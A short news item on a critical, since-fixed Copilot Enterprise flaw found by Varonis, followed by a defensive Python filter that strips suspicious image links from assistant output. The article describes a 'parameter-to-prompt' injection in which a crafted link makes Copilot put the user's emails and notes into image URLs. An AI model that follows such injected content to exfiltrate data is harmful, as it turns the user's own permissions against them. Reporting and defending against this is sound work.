Microsoft fixes Copilot Enterprise flaw that exposed workplace data
A major security flaw in Microsoft's Copilot Enterprise chatbot meant hackers could grab sensitive information, like emails and notes, with just a single click.
The trick worked through a parameter-to-prompt (P2P) injection, where attackers sent links that made Copilot pull user data into altered image links.
Microsoft called it "critical" and has since fixed it.
Varonis warns companies on AI security
This bug let hackers use whatever permissions you had at work, so anything you could access (emails, meetings, and notes) was up for grabs.
Researchers from Varonis warned that flaws like this show why companies need to be careful with AI tools and set up solid protections, or risk major data leaks.
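One protection of the kind described above, as an added example (not Microsoft's fix and not Varonis's code): a filter that audits assistant output for image links before a client renders and auto-fetches them. It assumes the output is rendered as Markdown or HTML; the host names, the length threshold and the sample text are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumptions (hypothetical values): hosts this deployment trusts for images,
# and the query-value length above which a parameter is treated as a payload.
ALLOWED_IMAGE_HOSTS = {"assets.example-corp.test"}
MAX_PARAM_LEN = 64

# Markdown image syntax or an HTML <img> tag; the URL lands in group 1 or 2.
IMAGE_LINK = re.compile(
    r'!\[[^\]]*\]\(\s*([^)\s]+)[^)]*\)'
    r'|<img[^>]+src=["\']([^"\']+)["\'][^>]*>', re.I)

def _url(match):
    return match.group(1) or match.group(2)

def audit_image_links(text):
    """Return [(url, reasons)] for image links that must not be auto-fetched."""
    findings = []
    for match in IMAGE_LINK.finditer(text):
        url = _url(match)
        try:
            parts = urlsplit(url)
        except ValueError:
            findings.append((url, ["unparseable URL"]))
            continue
        reasons = []
        if parts.scheme != "https":
            reasons.append("non-https scheme")
        if (parts.hostname or "").lower() not in ALLOWED_IMAGE_HOSTS:
            reasons.append("host not allowlisted")
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if len(value) > MAX_PARAM_LEN:
                reasons.append(f"long query value in '{key}'")
        if reasons:
            findings.append((url, reasons))
    return findings

def sanitize(text):
    """Swap flagged image links for a placeholder so nothing is fetched."""
    flagged = {url for url, _ in audit_image_links(text)}
    return IMAGE_LINK.sub(
        lambda m: "[image removed]" if _url(m) in flagged else m.group(0), text)

# Constructed sample output: one trusted image, one link carrying encoded data.
SAMPLE = (
    "Here is your summary.\n"
    "![logo](https://assets.example-corp.test/logo.png)\n"
    "![chart](https://img.collector.test/p.png?d=" + "QUJD" * 20 + ")\n"
)
```

Logging what `audit_image_links` returns alongside the prompt that produced it gives responders a record of which conversation attempted the outbound request.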